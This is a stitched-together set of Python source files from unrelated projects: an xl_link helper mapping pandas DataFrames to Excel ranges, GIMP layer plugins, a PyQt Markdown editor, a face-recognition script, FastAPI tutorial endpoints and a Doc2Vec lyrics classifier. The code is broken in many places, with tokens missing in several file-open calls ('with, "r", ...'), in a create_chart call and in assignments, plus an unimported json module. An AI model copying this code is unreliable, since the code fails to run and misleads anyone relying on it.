writer.sheets["XLLinked"] >>> xl_linked_chart = workbook.add_chart({'type': 'column'}) >>> for time in calories_per_meal.index: >>> xl_linked_chart.add_series({'name': time, 'categories': proxy.columns.frange, 'values': proxy.loc[time].frange}) """ def __init__(self, data_range, index_range, column_range, f, writer=None): self.index = index_range self.columns = column_range = data_range self._f = f.copy() self.writer = writer = self.sheet = writer.sheets[self.index.sheet] self._mapper_frame = f.copy().astype(XLCell) x_range = self._f.index.size y_range = self._f.columns.size for x in range(x_range): for y in range(y_range): self._mapper_frame.values[x, y] = data_range[x, y] @property def f(self): """ for convenience provides read-only access to the DataFrame originally written to excel. """ return self._f @property def df(self): """ for convenience provides read-only access to the DataFrame originally written to excel. """ return self._f def __repr__(self): return "<XLMap: index: {}, columns: {}, data: {}>".format(self.index, self.columns, def create_chart(self, type_='scatter', values=None, categories=None, names=None, subtype=None, title=None, x_axis_name=None, y_axis_name=None): """ Create excel chart object based off of data within the Frame. Parameters ---------- type_ : str Type of chart to create. values : str or list or tuple label or list of labels to corresponding to column to use as values for each series in chart. Default all columns. categories : str or list or tuple label or list of labels to corresponding to column to use as categories for each series in chart. Default, use index for 'scatter' or None for everything else. names: str or list or tuple str or list of strs to corresponding to names for each series in chart. Default, column names corresponding to values. subtype : str subtype of type, only available for some chart types e.g. bar, see Excel writing package for details title : str chart title x_axis_name : str used as label on x_axis y_axis_name : str used as label on y_axis Returns ------- Chart object corresponding to the engine selected Notes ----- values, categories parameters can only correspond to columns. """ if names is None and categories is None: names = tuple(name for name in self.f.columns.values) elif names is None and isinstance(categories, (str, int, list, tuple)): names = categories elif isinstance(names, (str, list, tuple)): names = names else: raise TypeError("Couldn't understand names input: " + names) if values is None: values = tuple(self[value] for value in self.f.columns) elif isinstance(values, list) or isinstance(values, tuple): values = tuple(self[value] for value in values) else: values = self[values] if categories is None and (type_ in SINGLE_CATEGORY_CHARTS and isinstance(values, tuple)) or \ type_ in CATEGORIES_REQUIRED_CHARTS: categories = self.index # Default, use x as index elif categories is None: pass elif isinstance(categories, (list, tuple)): categories = list(self[category] for category in categories) else: categories = self[categories] return create_chart(, self.writer.engine, type_, values, categories, names, subtype, title, x_axis_name, y_axis_name) def __getitem__(self, key): """ Emulates DataFrame.__getitem__ (DataFrame[key] syntax), see Pandas DataFrame indexing for help on behaviour. Will return the location of the columns found, rather than the underlying data. Parameters ---------- key : hashable or array-like hashables, corresponding to the names of the columns desired. Returns ------- XLRange : corresponding to position of found colummn(s) within spreadsheet Example ------- >>> xlmap['Col 1'] <XLRange: B2:B10> """ val = self._mapper_frame[key] return _mapper_to_xl(val) @property def loc(self): """ Proxy for DataFrame.loc, see Pandas DataFrame loc help for behaviour. Will return location result rather than underlying data. Returns ------- XLCell or XLRange corresponding to position of DataFrame, Series or Scalar found within spreadsheet. Example ------- >>> xlmap.loc['Tues'] <XLRange: A2:D2> """ return _SelectorProxy(self._mapper_frame, 'loc') @property def iloc(self): """ Proxy for DataFrame.iloc, see Pandas DataFrame iloc help for behaviour. Will return location result rather than underlying data. Returns ------- XLCell or XLRange corresponding to position of DataFrame, Series or Scalar found within spreadsheet. Example ------- >>> xlmap.iloc[3, :] <XLRange: A2:D2> """ return _SelectorProxy(self._mapper_frame, 'iloc') @property def ix(self): """ Proxy for DataFrame.ix, see Pandas DataFrame ix help for behaviour. (That said this is deprecated since 0.20!) Will return location result rather than underlying data. Returns ------- XLCell or XLRange corresponding to position of DataFrame, Series or Scalar found within spreadsheet. Example ------- >>> xlmap.ix[3, :] <XLRange A2:D2> """ return _SelectorProxy(self._mapper_frame, 'ix') @property def iat(self): """ Proxy for DataFrame.iat, see Pandas DataFrame iat help for behaviour. Will return location result rather than underlying data. Returns ------- XLCell location corresponding to position value within spreadsheet. Example ------- >>> xlmap.iat[3, 2] <XLCell C3> """ return _SelectorProxy(self._mapper_frame, 'iat') @property def at(self): """ Proxy for, see Pandas DataFrame at help for behaviour. Will return location result rather than underlying data. Returns ------- XLCell location corresponding to position value within spreadsheet. Example ------- >>>["Mon", "Lunch"] <XLCell: C3> """ return _SelectorProxy(self._mapper_frame, 'at') class XLDataFrame(pd.DataFrame): """ Monkeypatched DataFrame modified by xl_link! Changes: -------- * to_excel modified to return an XLMap. * XLDataFrame._constructor set to XLDataFrame -> stops reverting to normal DataFrame Notes ----- Conversions from this DataFrame to Series or Panels will return regular Panels and Series, which will convert back into regular DataFrame's upon expanding/ reducing dimensions. See Also -------- Pandas.DataFrame """ @property def _constructor(self): return XLDataFrame def to_excel(self, excel_writer, sheet_name='Sheet1', na_rep='', float_format=None, columns=None, header=True, index=True, index_label=None, startrow=0, startcol=0, engine=None, merge_cells=True, encoding=None, inf_rep='inf', verbose=True, **kwargs): """ Monkeypatched DataFrame.to_excel by xl_link! Changes: -------- Returns ------- XLMap corresponding to position of frame as it appears in excel (see XLMap for details) See Also -------- Pandas.DataFrame.to_excel for info on parameters Note ---- When providing a path as excel_writer, default engine used is 'xlsxwriter', as xlsxwriter workbooks can only be saved once, xl_link suppresses calling ``, as a result, `` should be called once no further changes are to be made to the spreadsheet. """ if isinstance(excel_writer, pd.ExcelWriter): need_save = False else: excel_writer = pd.ExcelWriter(_stringify_path(excel_writer), engine=engine) need_save = True if excel_writer.engine != 'xlsxwriter' else False # xlsxwriter can only save once! super().to_excel(excel_writer, sheet_name=sheet_name, na_rep=na_rep, float_format=float_format, columns=columns, header=header, index=index, index_label=index_label, startrow=startrow, startcol=startcol, engine=engine, merge_cells=merge_cells, encoding=encoding, inf_rep=inf_rep, verbose=verbose, **kwargs) if need_save: data_range, index_range, col_range, _ = get_xl_ranges(self.index, self.columns, sheet_name=sheet_name, columns=columns, header=header, index=index, index_label=index_label, startrow=startrow, startcol=startcol, merge_cells=merge_cells) f = self.copy() if isinstance(columns, list) or isinstance(columns, tuple): f = f[columns] return XLMap(data_range, index_range, col_range, f, writer=excel_writer) ```
{ "source": "0ion9/gimp-plugins", "score": 2 }
#### File: 0ion9/gimp-plugins/ ```python from gimpfu import * gettext.install("gimp20-python", gimp.locale_directory, unicode=True) BGCOLOR, PATTERN = 0, 1 MODES = ( (_('Normal'), NORMAL_MODE), (_('Dissolve'), DISSOLVE_MODE), (_('Lighten only'), LIGHTEN_ONLY_MODE), (_('Screen'), SCREEN_MODE), (_('Dodge'), DODGE_MODE), (_('Addition'), ADDITION_MODE), (_('Darken Only'), DARKEN_ONLY_MODE), (_('Multiply'), MULTIPLY_MODE), (_('Burn'), BURN_MODE), (_('Overlay'), OVERLAY_MODE), (_('Soft Light'), SOFTLIGHT_MODE), (_('Hard Light'), HARDLIGHT_MODE), (_('Difference'), DIFFERENCE_MODE), (_('Subtract'), SUBTRACT_MODE), (_('Grain Extract'), GRAIN_EXTRACT_MODE), (_('Grain Merge'), GRAIN_MERGE_MODE), (_('Divide'), DIVIDE_MODE), (_('Hue'), HUE_MODE), (_('Saturation'), SATURATION_MODE), (_('Color'), COLOR_MODE), (_('Value'), VALUE_MODE), (_('Behind(?)'), BEHIND_MODE), ) MODELIST = tuple(v[0] for v in MODES) # # some modes have a 'neutral color' that results in no change; we try to use this when creating a new layer without alpha. # # Note that the pairs (MULTIPLY, DIVIDE) and (ADD, SUB) each have inverse effects with the same neutral color # (eg. multiply reduces brightness proportional to distance from 255, divide increases brightness proportional to distance from 0) # # Other modes have no neutral color and obtaining 0 effect is only done via setting alpha=0 or layer_opacity=0 MODENEUTRALCOLOR = ( ({LIGHTEN_ONLY_MODE, ADDITION_MODE, SCREEN_MODE, SUBTRACT_MODE, DODGE_MODE}, (0, 0, 0)), ({DARKEN_ONLY_MODE, MULTIPLY_MODE, BURN_MODE, DIVIDE_MODE}, (255, 255, 255)), ({GRAIN_MERGE_MODE, GRAIN_EXTRACT_MODE, OVERLAY_MODE, HARDLIGHT_MODE, SOFTLIGHT_MODE}, (128, 128, 128)) ) def without_group_layers(layerlist): """Returns a recursively flattened list of layers. Group layers are recursed into but not included in results.""" layers = [] for l in layerlist: if pdb.gimp_item_is_group(l): layers.extend(without_group_layers(l.children)) else: layers.append(l) return layers def new_layer(image, drawable, name, mode, opacity, alpha): pdb.gimp_image_undo_group_start(image) layertype = image.layers[0].type mode = MODES[mode][-1] layer = pdb.gimp_layer_new(image, image.width, image.height, layertype, name, opacity, mode) for members, fillcolor in MODENEUTRALCOLOR: if mode in members: pdb.gimp_context_push() pdb.gimp_context_set_background(fillcolor) pdb.gimp_drawable_fill(layer, BACKGROUND_FILL) pdb.gimp_context_pop() break else: pdb.gimp_drawable_fill(layer, WHITE_FILL) pdb.gimp_image_insert_layer(image, layer, None, -1) if alpha: pdb.gimp_layer_add_alpha(layer) # else: # pdb.gimp_layer_remove_alpha(layer) pdb.gimp_image_undo_group_end(image) def backgroundify(image, drawable, fillmode, all_layers): all_layers = (all_layers == 1) # XXX cope with layer groups (they should be unaffected) layers = [] # drawable is set to None for group layers base = [drawable if drawable else image.active_layer] if all_layers: base = list(image.layers) layers = without_group_layers(base) pdb.gimp_image_undo_group_start(image) bfill_mode = (BG_BUCKET_FILL if fillmode == BGCOLOR else PATTERN_BUCKET_FILL) for layer in layers: pdb.gimp_edit_bucket_fill_full(layer, bfill_mode, BEHIND_MODE, 100.0, 255.0, 0, 1, 0, 0, 0) pdb.gimp_image_undo_group_end(image) register( proc_name="python-fu-backgroundify", blurb="Add a background color/pattern to current or all layers.", help=("Add a background color/pattern to current or all layers. Note that only the selected area is affected." " You may filter only the contents of a given layer group, by having it selected before invoking this filter. "), author="<NAME>", copyright="<NAME>", date=("2015"), label=("_Backgroundify layer(s)..."), imagetypes=("*"), params=[ (PF_IMAGE, "image", "_Image", None), (PF_LAYER, "drawable", "_Drawable", None), (PF_OPTION, "Fillmode", "_Fill mode", 0, (_("Background Color"), _("Pattern"))), (PF_BOOL, "all_layers", "Apply to _all layers", 0), ], results=[], function=backgroundify, menu=("<Image>/Layer/Transparency"), domain=("gimp20-python", gimp.locale_directory) ) register( proc_name="python-fu-new-layer", blurb="Quickly create a new image-sized layer with specified mode and opacity", help=("..."), author="<NAME>", copyright="<NAME>", date=("2015"), label=("_New Layer(quick)..."), imagetypes=("*"), params=[ (PF_IMAGE, "image", "_Image", None), (PF_LAYER, "drawable", "_Drawable", None), (PF_STRING, "name", "_Name", "Layer"), (PF_OPTION, "mode", "_Blending mode", 0, MODELIST), (PF_SLIDER, "opacity", "_Opacity", 100, (0, 100, 1)), (PF_BOOL, "alpha", "Alpha channel", 0), ], results=[], function=new_layer, menu=("<Image>/Layer/Stack"), domain=("gimp20-python", gimp.locale_directory) ) main() ```
{ "source": "0ip/pymarkview", "score": 3 }
#### File: pymarkview/pymarkview/ ```python import io import json from pathlib import Path class Settings: FILE = "settings.json" DEFAULTS = { "font_family": "Consolas", "font_size": 12, "tab_width": 2, "word_wrap": True, "show_menu": True, "md_parser": "markdown2", "mathjax": True } def __init__(self): self.__load_settings() def __getattr__(self, key: str) -> str: return self.DEFAULTS.get(key, None) def get(self, key: str) -> str: return self.DEFAULTS.get(key, None) def set(self, key: str, value) -> None: self.DEFAULTS[key] = value self.__save_settings() def __load_settings(self) -> None: if not Path(self.FILE).exists(): self.__save_settings() return with, "r", encoding="utf-8") as f: try: user_settings = json.load(f) except json.decoder.JSONDecodeError: raise SettingsError("Cannot read settings!") for key, value in user_settings.items(): if key in self.DEFAULTS: self.DEFAULTS[key] = value else: print("Found unknown setting '{key}'. Skipping.".format(key=key)) user_settings_stale = False for key, value in self.DEFAULTS.items(): if key not in user_settings: print("Adding new setting '{key}'.".format(key=key)) user_settings_stale = True if user_settings_stale: self.__save_settings() def __save_settings(self) -> None: with, "w", encoding="utf-8") as f: json.dump(self.DEFAULTS, f, indent=4, sort_keys=True) class SettingsError(Exception): def __init__(self, message): super().__init__(message) ``` #### File: pymarkview/ui/ ```python import io import pickle from PyQt5.QtCore import pyqtSignal from PyQt5.QtGui import QTextCursor from PyQt5.QtWidgets import QFileDialog from PyQt5.QtWidgets import QMessageBox from PyQt5.QtWidgets import QTabWidget from pymarkview.resources.defaults import welcome_text from pymarkview.util import resource_path from pathlib import Path class TabbedEditor(QTabWidget): text_changed = pyqtSignal() tab_changed = pyqtSignal() tab_title_changed = pyqtSignal(str) file_saved = pyqtSignal(str) STATE_FILE = ".saved_state" DEFAULT_TAB_NAME = "untitled" def __init__(self, parent, editor_widget, settings, *args): super().__init__(*args) self.__set_style() self._parent = parent self._editor_widget = editor_widget self._settings = settings self._editor_state = {} self._tab_state = {} self._mapping = self.TabIndexMapping() self.__load_state() self.tabCloseRequested.connect(self.close_tab) self.currentChanged.connect(self.__tab_changed) @property def current_editor(self): return self._editor_state.get(self._mapping.get_uid(self.currentIndex())) @property def current_tab_state(self): return self._tab_state.get(self._mapping.get_uid(self.currentIndex())) def __get_tab_state(self, tab_index=None): if tab_index is not None: return self._tab_state.get(self._mapping.get_uid(tab_index)) else: return self._tab_state.get(self._mapping.get_uid(self.currentIndex())) def __get_editor_state(self, tab_index): if tab_index is not None: return self._editor_state.get(self._mapping.get_uid(tab_index)) else: return self._editor_state.get(self._mapping.get_uid(self.currentIndex())) def __new_state(self, tab_index, editor_obj): uid = self._mapping.add(tab_index) self._tab_state.update({uid: { "modified": False, "path": None, "text": "" }}) self._editor_state.update({uid: editor_obj}) def __update_tab_state(self, attrib_dict, tab_index=None): if tab_index is None: tab_index = self.currentIndex() uid = self._mapping.get_uid(tab_index) if self._tab_state.get(uid): update_tab_title = False for attrib, value in attrib_dict.items(): self._tab_state.get(uid)[attrib] = value if attrib in ("path", "modified"): update_tab_title = True if update_tab_title: self.__update_tab_title() def __get_path(self, tab_index=None): state = self.__get_tab_state(tab_index) return state["path"] def __get_filename(self, tab_index=None): path = self.__get_path(tab_index) if path: return str(Path(path).name) else: return self.DEFAULT_TAB_NAME def get_filename(self): return self.tabText(self.currentIndex()) def new_tab(self, append=False): new_ln_editor = self._editor_widget(self._settings) if append: tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME) else: tab_index = self.insertTab(self.currentIndex() + 1, new_ln_editor, self.DEFAULT_TAB_NAME) self.__new_state(tab_index, new_ln_editor.editor) if len(self._editor_state) == 1: self.__connect_tab_signals(tab_index) else: self.setCurrentIndex(tab_index) return tab_index def close_tab(self, tab_index): state = self.__get_tab_state(tab_index) if state["modified"]: res = self.__show_save_dialog() if res == QMessageBox.Yes: if not self.save_file(): return False elif res == QMessageBox.Cancel: return False if len(self._editor_state) == 1: self.new_tab() self.removeTab(tab_index) uid = self._mapping.remove(tab_index) self._tab_state.pop(uid) self._editor_state.pop(uid) self.tab_changed.emit() def set_text(self, text, tab_index=None): editor = self.__get_editor_state(tab_index) if editor: editor.setPlainText(text) def get_text(self, tab_index=None): editor = self.__get_editor_state(tab_index) if editor: return editor.toPlainText() def open_file(self, path, pmv_file=False): if path: return self.__open_file_helper(path, pmv_file) else: filename, _ = QFileDialog.getOpenFileName(self._parent, "Open Markdown text file", "", "Text Files (*.txt;*.md);;All Files (*)") if filename: return self.__open_file_helper(filename) else: return False def __open_file_helper(self, path, pmv_file=False): assert path, "No file name provided!" if pmv_file: curr_path = self.__get_path() if not curr_path: # temporary, unsaved tabs return False path = str(Path(self.__get_path()).parent.joinpath(path)) for uid, attrib_dict in self._tab_state.items(): if attrib_dict["path"]: if Path(attrib_dict["path"]) == Path(path): self.setCurrentIndex(self._mapping.get_index(uid)) return False if Path(path).exists(): with, "r", encoding="utf-8", errors="replace") as f: data = tab_index = self.new_tab(append=True) self.set_text(data, tab_index) self.__update_tab_state({"path": path, "modified": False}) return True else: return False def save_file(self): state = self.current_tab_state path = state["path"] if path: with, "w", encoding="utf-8") as f: f.write(self.get_text()) self.file_saved.emit(path) self.__update_tab_state({"modified": False}) return True else: return self.save_as_file() def save_as_file(self): path, sel_filter = QFileDialog.getSaveFileName(self._parent, "Save as...", "", "Markdown File (*.md);;Text File (*.txt)") if path: with, "w", encoding="utf-8") as f: f.write(self.get_text()) self.file_saved.emit(path) self.__update_tab_state({"path": path, "modified": False}) return True return False def load_instructions(self): tab_index = self.new_tab() self.set_text(welcome_text, tab_index) self.__update_tab_state({"modified": False}, tab_index) def __handle_text_change(self): self.__update_tab_state({"modified": True}) self.text_changed.emit() def __connect_tab_signals(self, tab_index): self.__get_editor_state(tab_index).textChanged.connect(self.__handle_text_change) self.__get_editor_state(tab_index).document_dropped.connect(self.open_file) def __tab_changed(self, tab_index): self.__connect_tab_signals(tab_index) self.tab_changed.emit() def __load_state(self): if Path(self.STATE_FILE).exists(): with, "rb") as f: state = pickle.load(f) self._mapping.import_mapping(state["mapping"]) for uid in self._mapping.mapping: new_ln_editor = self._editor_widget(self._settings) tab_index = self.addTab(new_ln_editor, self.DEFAULT_TAB_NAME) self._editor_state.update({uid: new_ln_editor.editor}) self.__connect_tab_signals(tab_index) self._tab_state = state["tab_state"] for uid, tab_state in self._tab_state.copy().items(): tab_index = self._mapping.get_index(uid) self.setCurrentIndex(tab_index) if tab_state["modified"]: self.set_text(tab_state["text"], tab_index) self._tab_state[uid]["modified"] = True else: path = tab_state["path"] if path: if Path(path).exists(): with, "r", encoding="utf-8") as f: data = self.set_text(data, tab_index) self._tab_state[uid]["modified"] = False else: self.set_text(tab_state["text"], tab_index) self._tab_state[uid]["modified"] = True else: self.set_text(tab_state["text"], tab_index) self._tab_state[uid]["modified"] = False self.__update_tab_title(self._mapping.get_index(uid)) self.setCurrentIndex(state["active_tab"]) current_editor = self.current_editor current_editor.moveCursor(QTextCursor.End) cursor = QTextCursor(current_editor.document().findBlockByLineNumber(state["active_line"])) current_editor.setTextCursor(cursor) else: self.load_instructions() def save_state(self): for tab_index in range(self.count()): self.__update_tab_state({"text": self.get_text(tab_index)}, tab_index) state = { "active_tab": self.currentIndex(), "active_line": self.current_editor.textCursor().blockNumber(), "mapping": self._mapping.export_mapping(), "tab_state": self._tab_state } with, "wb") as f: pickle.dump(state, f) def __update_tab_title(self, tab_index=None): if tab_index is None: tab_index = self.currentIndex() state = self.__get_tab_state(tab_index) title = "" title += self.__get_filename(tab_index) title += " •" if state["modified"] else "" self.setTabText(tab_index, title) self.tab_title_changed.emit(title) def __show_save_dialog(self): msg = QMessageBox() # msg.setWindowIcon(self.app_icon) msg.setIcon(QMessageBox.Warning) msg.setWindowTitle("Save Changes?") msg.setText("{file} has been modified. Save changes?".format(file=self.__get_filename())) msg.addButton(QMessageBox.Yes) msg.addButton(QMessageBox.No) msg.addButton(QMessageBox.Cancel) return msg.exec() def __set_style(self): self.setTabsClosable(True) self.setStyleSheet(''' QTabBar::close-button { image: url(''' + resource_path("pymarkview/resources/close.png") + '''); } QTabBar::close-button:hover { image: url(''' + resource_path("pymarkview/resources/close-hover.png") + '''); } ''') class TabIndexMapping: def __init__(self): self._mapping = [] self._mapping_uid = 1000 def add(self, index=None): uid = self._mapping_uid if index is not None: self._mapping.insert(index, uid) else: self._mapping.append(uid) self._mapping_uid += 1 return uid def remove(self, index): return self._mapping.pop(index) def get_uid(self, index): return self._mapping[index] def get_index(self, uid): return self._mapping.index(uid) @property def mapping(self): return self._mapping def export_mapping(self): return {"__mapping": self._mapping, "__mapping_uid": self._mapping_uid} def import_mapping(self, mapping_dict): self._mapping = mapping_dict["__mapping"] self._mapping_uid = mapping_dict["__mapping_uid"] ```
{ "source": "0-jam/face_detector", "score": 3 }
#### File: 0-jam/face_detector/ ```python import argparse from pathlib import Path import time import cv2 from modules.dark_recognizer import recognize_face def main(): parser = argparse.ArgumentParser(description='Recognize objects using pre-trained Darknet model') parser.add_argument('input', type=str, help='Input file') parser.add_argument('--output', '-o', type=str, help='Output file (default: none)') args = parser.parse_args() img = cv2.imread(str(Path(args.input))) start_time = time.time() faces = recognize_face(img) elapsed_time = time.time() - start_time print('Found objects: {}, Elapsed time: {:.2f} sec'.format(len(faces), elapsed_time)) print(faces) out_path = args.output if out_path is not None: with Path(out_path).open('w') as out_json: out_json.write(json.dumps(faces, ensure_ascii=False)) if __name__ == "__main__": main() ```
{ "source": "0-jam/fastapi_tutorials", "score": 3 }
#### File: 0-jam/fastapi_tutorials/ ```python from typing import Optional from fastapi import FastAPI, Path, Query app = FastAPI() # Recieve the parameter 'q' with the default value (None) and the limit of characters (5) @app.get('/items/') async def read_items( q: Optional[str] = Query( None, min_length=3, max_length=5, # Custom metadata # 'description' can be shown in the document title='Query String', description='Query string for the items', alias='item-query', ) ): results = {'items': [ {'item_id': 'Foo'}, {'item_id': 'Bar'}, ]} if q: results.update({'q': q}) return results # Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions # This query is marked as deprecated (can be shown on documents) @app.get('/items_fixed/') async def read_items_fixed(q: Optional[str] = Query(None, min_length=3, max_length=50, regex='^fixedquery$', deprecated=True)): results = {'items': [ {'item_id': 'Foo'}, {'item_id': 'Bar'}, ]} if q: results.update({'q': q}) return results # Recieve the parameter 'q' which accepts only the fixed value ('fixedquery') using reqular expressions @app.get('/items_required/') async def read_items_required(q: str = Query(..., min_length=3, max_length=5)): results = {'items': [ {'item_id': 'Foo'}, {'item_id': 'Bar'}, ]} if q: results.update({'q': q}) return results @app.get('/items/{item_id}') async def read_item( # Pass parameters as keyword arguments # All parameters are required # gt: greater than # lt: less than # ge: greater than or equal # le: less than or equal *, item_id: int = Path( ..., title='The ID of the item to get', ge=1, lt=100, ), q: str, size: float = Query(..., gt=0, le=10.5), ): results = {'item_id': item_id, 'size': size} if q: results.update({'q': q}) return results ```
{ "source": "0-jam/markovify_my_tweets", "score": 3 }
#### File: 0-jam/markovify_my_tweets/ ```python import argparse import json import multiprocessing as mp import re import unicodedata from pathlib import Path from gensim.models.doc2vec import Doc2Vec, TaggedDocument from modules.transform_text import deconjugate_sentence, remove_stopwords # from modules.transform_text import extract_nouns, remove_stopwords NUM_CPU = mp.cpu_count() D2V_EPOCHS = 100 # 引数sentenceを整形 def replace_sentence(sentence): # unicode正規化 sentence = unicodedata.normalize('NFKC', sentence) # 不要な記号を削除 sentence = re.sub(r'\W', '', sentence) return sentence # Preprocess the text for Doc2Vec def preprocess_text(text): normalized_text = replace_sentence(text.strip()) divided_text = deconjugate_sentence(normalized_text) # divided_text = extract_nouns(normalized_text) return remove_stopwords(divided_text) def main(): parser = argparse.ArgumentParser(description='Classify sentence with doc2vec') # Required arguments parser.add_argument('input', type=str, help='Input JSON file path generated from') parser.add_argument('generated_file', type=str, help='Generated lyrics from') parser.add_argument('--d2vmodel', type=str, help='Doc2vec model path') args = parser.parse_args() if args.d2vmodel: print('Loading doc2vec model...') d2vmodel = Doc2Vec.load(args.d2vmodel) else: input_path = Path(args.input) with'utf-8') as json_data: dataset = json.load(json_data).values() # Attribute as data or labels data_attr = 'lyric' label_attrs = ['artist'] print('Generating doc2vec model...') docs = [TaggedDocument(preprocess_text(data[data_attr]), tags=[unicodedata.normalize('NFKC', data[attr]) for attr in label_attrs]) for data in dataset] d2vmodel = Doc2Vec(docs, vector_size=256, window=5, min_count=3, epochs=D2V_EPOCHS, workers=NUM_CPU) + '.model') with Path(args.generated_file).open() as generated_lyrics: for i, generated_lyric in enumerate(generated_lyrics): print('Song', i) print(d2vmodel.docvecs.most_similar([d2vmodel.infer_vector(preprocess_text(generated_lyric))])) if __name__ == '__main__': main() ```